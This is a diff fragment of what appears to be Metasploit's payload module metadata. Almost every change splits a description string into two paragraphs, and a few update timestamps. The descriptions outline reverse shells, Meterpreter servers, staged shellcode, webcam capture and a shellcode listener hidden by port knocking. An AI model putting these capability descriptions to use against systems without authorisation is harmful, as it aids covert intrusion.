+    "description": "Execute a Python payload from a command.\n\nListens for a connection from the attacker, sends a UUID, then terminates",
    "references": [

    ],
@@ -188786,7 +189632,7 @@
      "Spencer McIntyre",
      "asoto-r7"
    ],
-    "description": "Execute a Python payload from a command. Connects back to the attacker, sends a UUID, then terminates",
+    "description": "Execute a Python payload from a command.\n\nConnects back to the attacker, sends a UUID, then terminates",
    "references": [

    ],
@@ -188821,7 +189667,7 @@
      "Spencer McIntyre",
      "mumbai"
    ],
-    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
+    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
    "references": [

    ],
@@ -188856,7 +189702,7 @@
      "Spencer McIntyre",
      "Ben Campbell <eat_meatballs@hotmail.co.uk>"
    ],
-    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
+    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.4-2.7 and 3.4+.",
    "references": [

    ],
@@ -188891,7 +189737,7 @@
      "Spencer McIntyre",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
+    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, uses SSL, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
    "references": [

    ],
@@ -188926,7 +189772,7 @@
      "Spencer McIntyre",
      "RageLtMan <rageltman@sempervictus>"
    ],
-    "description": "Execute a Python payload from a command. Creates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
+    "description": "Execute a Python payload from a command.\n\nCreates an interactive shell via Python, encodes with base64 by design. Compatible with Python 2.6-2.7 and 3.4+.",
    "references": [

    ],
@@ -189474,7 +190320,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Run a meterpreter server in Java. Listen for a connection",
+    "description": "Run a meterpreter server in Java.\n\nListen for a connection",
    "references": [

    ],
@@ -189511,7 +190357,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Run a meterpreter server in Java. Tunnel communication over HTTP",
+    "description": "Run a meterpreter server in Java.\n\nTunnel communication over HTTP",
    "references": [

    ],
@@ -189548,7 +190394,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Run a meterpreter server in Java. Tunnel communication over HTTPS",
+    "description": "Run a meterpreter server in Java.\n\nTunnel communication over HTTPS",
    "references": [

    ],
@@ -189584,7 +190430,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Run a meterpreter server in Java. Connect back stager",
+    "description": "Run a meterpreter server in Java.\n\nConnect back stager",
    "references": [

    ],
@@ -189619,7 +190465,7 @@
      "mihi",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection",
+    "description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else).\n\nListen for a connection",
    "references": [

    ],
@@ -189654,7 +190500,7 @@
      "mihi",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager",
+    "description": "Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else).\n\nConnect back stager",
    "references": [

    ],
@@ -189723,7 +190569,7 @@
    "author": [
      "Adam Cammack <adam_cammack@rapid7.com>"
    ],
-    "description": "Inject the mettle server payload (staged). Connect back to the attacker",
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -189865,7 +190711,7 @@
    "author": [

    ],
-    "description": "dup2 socket in x12, then execve. Connect back to the attacker",
+    "description": "dup2 socket in x12, then execve.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -190144,7 +190990,7 @@
      "Adam Cammack <adam_cammack@rapid7.com>",
      "nemo <nemo@felinemenace.org>"
    ],
-    "description": "Inject the mettle server payload (staged). Listen for a connection",
+    "description": "Inject the mettle server payload (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -190180,7 +191026,7 @@
      "nemo <nemo@felinemenace.org>",
      "tkmru"
    ],
-    "description": "Inject the mettle server payload (staged). Connect back to the attacker",
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -190322,7 +191168,7 @@
    "author": [
      "nemo <nemo@felinemenace.org>"
    ],
-    "description": "dup2 socket in r12, then execve. Listen for a connection",
+    "description": "dup2 socket in r12, then execve.\n\nListen for a connection",
    "references": [

    ],
@@ -190357,7 +191203,7 @@
      "nemo <nemo@felinemenace.org>",
      "tkmru"
    ],
-    "description": "dup2 socket in r12, then execve. Connect back to the attacker",
+    "description": "dup2 socket in r12, then execve.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -190605,7 +191451,7 @@
      "juan vazquez <juan.vazquez@metasploit.com>",
      "tkmru"
    ],
-    "description": "Inject the mettle server payload (staged). Connect back to the attacker",
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -190783,7 +191629,7 @@
      "juan vazquez <juan.vazquez@metasploit.com>",
      "tkmru"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -190926,7 +191772,7 @@
      "juan vazquez <juan.vazquez@metasploit.com>",
      "tkmru"
    ],
-    "description": "Inject the mettle server payload (staged). Connect back to the attacker",
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -191104,7 +191950,7 @@
      "juan vazquez <juan.vazquez@metasploit.com>",
      "tkmru"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -191774,7 +192620,7 @@
      "Brent Cook <bcook@rapid7.com>",
      "ricky"
    ],
-    "description": "Inject the mettle server payload (staged). Listen for a connection",
+    "description": "Inject the mettle server payload (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -191810,7 +192656,7 @@
      "ricky",
      "tkmru"
    ],
-    "description": "Inject the mettle server payload (staged). Connect back to the attacker",
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -192020,7 +192866,7 @@
    "author": [
      "ricky"
    ],
-    "description": "Spawn a command shell (staged). Listen for a connection",
+    "description": "Spawn a command shell (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -192055,7 +192901,7 @@
      "ricky",
      "tkmru"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -192401,7 +193247,7 @@
      "kris katterjohn <katterjohn@gmail.com>",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Inject the mettle server payload (staged). Listen for an IPv6 connection (Linux x86)",
+    "description": "Inject the mettle server payload (staged).\n\nListen for an IPv6 connection (Linux x86)",
    "references": [

    ],
@@ -192438,7 +193284,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the mettle server payload (staged). Listen for an IPv6 connection with UUID Support (Linux x86)",
+    "description": "Inject the mettle server payload (staged).\n\nListen for an IPv6 connection with UUID Support (Linux x86)",
    "references": [

    ],
@@ -192473,7 +193319,7 @@
      "William Webb <william_webb@rapid7.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject the mettle server payload (staged). Listen for a connection",
+    "description": "Inject the mettle server payload (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -192509,7 +193355,7 @@
      "skape <mmiller@hick.org>",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Inject the mettle server payload (staged). Listen for a connection (Linux x86)",
+    "description": "Inject the mettle server payload (staged).\n\nListen for a connection (Linux x86)",
    "references": [

    ],
@@ -192546,7 +193392,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the mettle server payload (staged). Listen for a connection with UUID Support (Linux x86)",
+    "description": "Inject the mettle server payload (staged).\n\nListen for a connection with UUID Support (Linux x86)",
    "references": [

    ],
@@ -192581,7 +193427,7 @@
      "William Webb <william_webb@rapid7.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject the mettle server payload (staged). Use an established connection",
+    "description": "Inject the mettle server payload (staged).\n\nUse an established connection",
    "references": [

    ],
@@ -192616,7 +193462,7 @@
      "William Webb <william_webb@rapid7.com>",
      "kris katterjohn <katterjohn@gmail.com>"
    ],
-    "description": "Inject the mettle server payload (staged). Connect back to attacker over IPv6",
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to attacker over IPv6",
    "references": [

    ],
@@ -192651,7 +193497,7 @@
      "William Webb <william_webb@rapid7.com>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Inject the mettle server payload (staged). Connect back to the attacker",
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -192688,7 +193534,7 @@
      "egypt <egypt@metasploit.com>",
      "tkmru"
    ],
-    "description": "Inject the mettle server payload (staged). Connect back to the attacker",
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -192725,7 +193571,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the mettle server payload (staged). Connect back to the attacker",
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -192971,7 +193817,7 @@
      "kris katterjohn <katterjohn@gmail.com>",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Spawn a command shell (staged). Listen for an IPv6 connection (Linux x86)",
+    "description": "Spawn a command shell (staged).\n\nListen for an IPv6 connection (Linux x86)",
    "references": [

    ],
@@ -193008,7 +193854,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Spawn a command shell (staged). Listen for an IPv6 connection with UUID Support (Linux x86)",
+    "description": "Spawn a command shell (staged).\n\nListen for an IPv6 connection with UUID Support (Linux x86)",
    "references": [

    ],
@@ -193042,7 +193888,7 @@
    "author": [
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a command shell (staged). Listen for a connection",
+    "description": "Spawn a command shell (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -193077,7 +193923,7 @@
      "skape <mmiller@hick.org>",
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Spawn a command shell (staged). Listen for a connection (Linux x86)",
+    "description": "Spawn a command shell (staged).\n\nListen for a connection (Linux x86)",
    "references": [

    ],
@@ -193113,7 +193959,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Spawn a command shell (staged). Listen for a connection with UUID Support (Linux x86)",
+    "description": "Spawn a command shell (staged).\n\nListen for a connection with UUID Support (Linux x86)",
    "references": [

    ],
@@ -193147,7 +193993,7 @@
    "author": [
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a command shell (staged). Use an established connection",
+    "description": "Spawn a command shell (staged).\n\nUse an established connection",
    "references": [

    ],
@@ -193182,7 +194028,7 @@
      "skape <mmiller@hick.org>",
      "kris katterjohn <katterjohn@gmail.com>"
    ],
-    "description": "Spawn a command shell (staged). Connect back to attacker over IPv6",
+    "description": "Spawn a command shell (staged).\n\nConnect back to attacker over IPv6",
    "references": [

    ],
@@ -193216,7 +194062,7 @@
    "author": [
      "skape <mmiller@hick.org>"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -193252,7 +194098,7 @@
      "egypt <egypt@metasploit.com>",
      "tkmru"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -193288,7 +194134,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -193705,7 +194551,7 @@
    "author": [
      "OJ Reeves"
    ],
-    "description": "Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTP",
+    "description": "Handle Meterpreter sessions regardless of the target arch/platform.\n\nTunnel communication over HTTP",
    "references": [

    ],
@@ -193739,7 +194585,7 @@
    "author": [
      "OJ Reeves"
    ],
-    "description": "Handle Meterpreter sessions regardless of the target arch/platform. Tunnel communication over HTTPS",
+    "description": "Handle Meterpreter sessions regardless of the target arch/platform.\n\nTunnel communication over HTTPS",
    "references": [

    ],
@@ -193773,7 +194619,7 @@
    "author": [
      "toto"
    ],
-    "description": "Connect to the NetWare console (staged). Connect back to the attacker",
+    "description": "Connect to the NetWare console (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -193911,7 +194757,7 @@
    "author": [
      "hdm <x@hdm.io>"
    ],
-    "description": "Spawn a command shell (staged). Listen for a connection",
+    "description": "Spawn a command shell (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -193945,7 +194791,7 @@
    "author": [
      "hdm <x@hdm.io>"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -193979,7 +194825,7 @@
    "author": [
      "hdm <x@hdm.io>"
    ],
-    "description": "Spawn a command shell (staged). Listen for a connection",
+    "description": "Spawn a command shell (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -194013,7 +194859,7 @@
    "author": [
      "hdm <x@hdm.io>"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -194149,7 +194995,7 @@
    "author": [
      "hdm <x@hdm.io>"
    ],
-    "description": "Spawn a command shell (staged). Listen for a connection",
+    "description": "Spawn a command shell (staged).\n\nListen for a connection",
    "references": [

    ],
@@ -194183,7 +195029,7 @@
    "author": [
      "hdm <x@hdm.io>"
    ],
-    "description": "Spawn a command shell (staged). Use an established connection",
+    "description": "Spawn a command shell (staged).\n\nUse an established connection",
    "references": [

    ],
@@ -194217,7 +195063,7 @@
    "author": [
      "hdm <x@hdm.io>"
    ],
-    "description": "Spawn a command shell (staged). Connect back to the attacker",
+    "description": "Spawn a command shell (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -194320,7 +195166,7 @@
      "nemo",
      "nemo <nemo@felinemenace.org>"
    ],
-    "description": "dup2 socket in edi, then execve. Listen, read length, read buffer, execute",
+    "description": "dup2 socket in edi, then execve.\n\nListen, read length, read buffer, execute",
    "references": [

    ],
@@ -194355,7 +195201,7 @@
      "nemo",
      "nemo <nemo@felinemenace.org>"
    ],
-    "description": "dup2 socket in edi, then execve. Connect, read length, read buffer, execute",
+    "description": "dup2 socket in edi, then execve.\n\nConnect, read length, read buffer, execute",
    "references": [

    ],
@@ -194390,7 +195236,7 @@
      "nemo",
      "timwr"
    ],
-    "description": "dup2 socket in edi, then execve. Connect back to the attacker with UUID Support (OSX x64)",
+    "description": "dup2 socket in edi, then execve.\n\nConnect back to the attacker with UUID Support (OSX x64)",
    "references": [

    ],
@@ -194462,7 +195308,7 @@
      "timwr",
      "nemo <nemo@felinemenace.org>"
    ],
-    "description": "Inject the mettle server payload (staged). Listen, read length, read buffer, execute",
+    "description": "Inject the mettle server payload (staged).\n\nListen, read length, read buffer, execute",
    "references": [
      "URL-https://github.com/CylanceVulnResearch/osx_runbin",
      "URL-https://github.com/nologic/shellcc"
@@ -194500,7 +195346,7 @@
      "timwr",
      "nemo <nemo@felinemenace.org>"
    ],
-    "description": "Inject the mettle server payload (staged). Connect, read length, read buffer, execute",
+    "description": "Inject the mettle server payload (staged).\n\nConnect, read length, read buffer, execute",
    "references": [
      "URL-https://github.com/CylanceVulnResearch/osx_runbin",
      "URL-https://github.com/nologic/shellcc"
@@ -194537,7 +195383,7 @@
      "nologic",
      "timwr"
    ],
-    "description": "Inject the mettle server payload (staged). Connect back to the attacker with UUID Support (OSX x64)",
+    "description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker with UUID Support (OSX x64)",
    "references": [
      "URL-https://github.com/CylanceVulnResearch/osx_runbin",
      "URL-https://github.com/nologic/shellcc"
@@ -194816,7 +195662,7 @@
    "author": [
      "ddz <ddz@theta44.org>"
    ],
-    "description": "Inject a custom Mach-O bundle into the exploited process. Listen, read length, read buffer, execute",
+    "description": "Inject a custom Mach-O bundle into the exploited process.\n\nListen, read length, read buffer, execute",
    "references": [

    ],
@@ -194850,7 +195696,7 @@
    "author": [
      "ddz <ddz@theta44.org>"
    ],
-    "description": "Inject a custom Mach-O bundle into the exploited process. Connect, read length, read buffer, execute",
+    "description": "Inject a custom Mach-O bundle into the exploited process.\n\nConnect, read length, read buffer, execute",
    "references": [

    ],
@@ -194920,7 +195766,7 @@
    "author": [
      "ddz <ddz@theta44.org>"
    ],
-    "description": "Inject a Mach-O bundle to capture a photo from the iSight (staged). Listen, read length, read buffer, execute",
+    "description": "Inject a Mach-O bundle to capture a photo from the iSight (staged).\n\nListen, read length, read buffer, execute",
    "references": [

    ],
@@ -194954,7 +195800,7 @@
    "author": [
      "ddz <ddz@theta44.org>"
    ],
-    "description": "Inject a Mach-O bundle to capture a photo from the iSight (staged). Connect, read length, read buffer, execute",
+    "description": "Inject a Mach-O bundle to capture a photo from the iSight (staged).\n\nConnect, read length, read buffer, execute",
    "references": [

    ],
@@ -195090,7 +195936,7 @@
    "author": [
      "ddz <ddz@theta44.org>"
    ],
-    "description": "Call vfork() if necessary and spawn a command shell (staged). Listen, read length, read buffer, execute",
+    "description": "Call vfork() if necessary and spawn a command shell (staged).\n\nListen, read length, read buffer, execute",
    "references": [

    ],
@@ -195124,7 +195970,7 @@
    "author": [
      "ddz <ddz@theta44.org>"
    ],
-    "description": "Call vfork() if necessary and spawn a command shell (staged). Connect, read length, read buffer, execute",
+    "description": "Call vfork() if necessary and spawn a command shell (staged).\n\nConnect, read length, read buffer, execute",
    "references": [

    ],
@@ -195434,7 +196280,7 @@
    "author": [
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Run a meterpreter server in PHP. Listen for a connection",
+    "description": "Run a meterpreter server in PHP.\n\nListen for a connection",
    "references": [

    ],
@@ -195468,7 +196314,7 @@
    "author": [
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Run a meterpreter server in PHP. Listen for a connection over IPv6",
+    "description": "Run a meterpreter server in PHP.\n\nListen for a connection over IPv6",
    "references": [

    ],
@@ -195503,7 +196349,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Run a meterpreter server in PHP. Listen for a connection over IPv6 with UUID Support",
+    "description": "Run a meterpreter server in PHP.\n\nListen for a connection over IPv6 with UUID Support",
    "references": [

    ],
@@ -195538,7 +196384,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Run a meterpreter server in PHP. Listen for a connection with UUID Support",
+    "description": "Run a meterpreter server in PHP.\n\nListen for a connection with UUID Support",
    "references": [

    ],
@@ -195572,7 +196418,7 @@
    "author": [
      "egypt <egypt@metasploit.com>"
    ],
-    "description": "Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions",
+    "description": "Run a meterpreter server in PHP.\n\nReverse PHP connect back stager with checks for disabled functions",
    "references": [

    ],
@@ -195607,7 +196453,7 @@
      "egypt <egypt@metasploit.com>",
      "OJ Reeves"
    ],
-    "description": "Run a meterpreter server in PHP. Reverse PHP connect back stager with checks for disabled functions",
+    "description": "Run a meterpreter server in PHP.\n\nReverse PHP connect back stager with checks for disabled functions",
    "references": [

    ],
@@ -195777,7 +196623,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection",
+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection",
    "references": [

    ],
@@ -195812,7 +196658,7 @@
      "Spencer McIntyre",
      "OJ Reeves"
    ],
-    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Listen for a connection with UUID Support",
+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection with UUID Support",
    "references": [

    ],
@@ -195846,7 +196692,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP",
+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP",
    "references": [

    ],
@@ -195880,7 +196726,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Tunnel communication over HTTP using SSL",
+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nTunnel communication over HTTP using SSL",
    "references": [

    ],
@@ -195914,7 +196760,7 @@
    "author": [
      "Spencer McIntyre"
    ],
-    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker",
+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -195950,7 +196796,7 @@
      "Ben Campbell <eat_meatballs@hotmail.co.uk>",
      "RageLtMan"
    ],
-    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Reverse Python connect back stager using SSL",
+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nReverse Python connect back stager using SSL",
    "references": [

    ],
@@ -195985,7 +196831,7 @@
      "Spencer McIntyre",
      "OJ Reeves"
    ],
-    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+). Connect back to the attacker with UUID Support",
+    "description": "Run a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -196165,7 +197011,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-08 10:26:27 +0000",
+    "mod_time": "2023-03-21 16:49:25 +0000",
    "path": "/modules/payloads/singles/python/pingback_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "python/pingback_bind_tcp",
@@ -196199,7 +197045,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-08 10:26:27 +0000",
+    "mod_time": "2023-03-21 16:49:25 +0000",
    "path": "/modules/payloads/singles/python/pingback_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "python/pingback_reverse_tcp",
@@ -196913,7 +197759,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Custom shellcode stage. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Custom shellcode stage.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -196951,7 +197797,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Custom shellcode stage. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Custom shellcode stage.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -196988,7 +197834,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Custom shellcode stage. Listen for an IPv6 connection (Windows x86)",
+    "description": "Custom shellcode stage.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -197026,7 +197872,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Custom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -197061,7 +197907,7 @@
      "bwatters-r7",
      "UserExistsError"
    ],
-    "description": "Custom shellcode stage. Listen for a pipe connection (Windows x86)",
+    "description": "Custom shellcode stage.\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -197096,7 +197942,7 @@
      "bwatters-r7",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Custom shellcode stage. Listen for a connection (No NX)",
+    "description": "Custom shellcode stage.\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -197133,7 +197979,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Custom shellcode stage. Listen for a connection (Windows x86)",
+    "description": "Custom shellcode stage.\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -197172,7 +198018,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Custom shellcode stage. Listen for a connection",
+    "description": "Custom shellcode stage.\n\nListen for a connection",
    "references": [

    ],
@@ -197208,7 +198054,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Custom shellcode stage.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -197243,7 +198089,7 @@
      "bwatters-r7",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Custom shellcode stage. Use an established connection",
+    "description": "Custom shellcode stage.\n\nUse an established connection",
    "references": [

    ],
@@ -197280,7 +198126,7 @@
      "bannedit <bannedit@metasploit.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Custom shellcode stage. \n        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n        data/hop/hop.php to the PHP server you wish to use as a hop.",
+    "description": "Custom shellcode stage.\n\nTunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\ndata/hop/hop.php to the PHP server you wish to use as a hop.",
    "references": [

    ],
@@ -197315,7 +198161,7 @@
      "bwatters-r7",
      "hdm <x@hdm.io>"
    ],
-    "description": "Custom shellcode stage. Tunnel communication over HTTP (Windows wininet)",
+    "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows wininet)",
    "references": [

    ],
@@ -197350,7 +198196,7 @@
      "bwatters-r7",
      "hdm <x@hdm.io>"
    ],
-    "description": "Custom shellcode stage. Tunnel communication over HTTP",
+    "description": "Custom shellcode stage.\n\nTunnel communication over HTTP",
    "references": [

    ],
@@ -197385,7 +198231,7 @@
      "bwatters-r7",
      "hdm <x@hdm.io>"
    ],
-    "description": "Custom shellcode stage. Tunnel communication over HTTPS (Windows wininet)",
+    "description": "Custom shellcode stage.\n\nTunnel communication over HTTPS (Windows wininet)",
    "references": [

    ],
@@ -197422,7 +198268,7 @@
      "corelanc0d3r <peter.ve@corelan.be>",
      "amaloteaux <alex_maloteaux@metasploit.com>"
    ],
-    "description": "Custom shellcode stage. Tunnel communication over HTTP using SSL with custom proxy support",
+    "description": "Custom shellcode stage.\n\nTunnel communication over HTTP using SSL with custom proxy support",
    "references": [

    ],
@@ -197459,7 +198305,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker over IPv6",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -197494,7 +198340,7 @@
      "bwatters-r7",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker via a named pipe pivot",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [

    ],
@@ -197529,7 +198375,7 @@
      "bwatters-r7",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker (No NX)",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -197564,7 +198410,7 @@
      "bwatters-r7",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -197601,7 +198447,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -197638,7 +198484,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Custom shellcode stage. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Custom shellcode stage.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -197676,7 +198522,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -197715,7 +198561,7 @@
      "mihi",
      "RageLtMan"
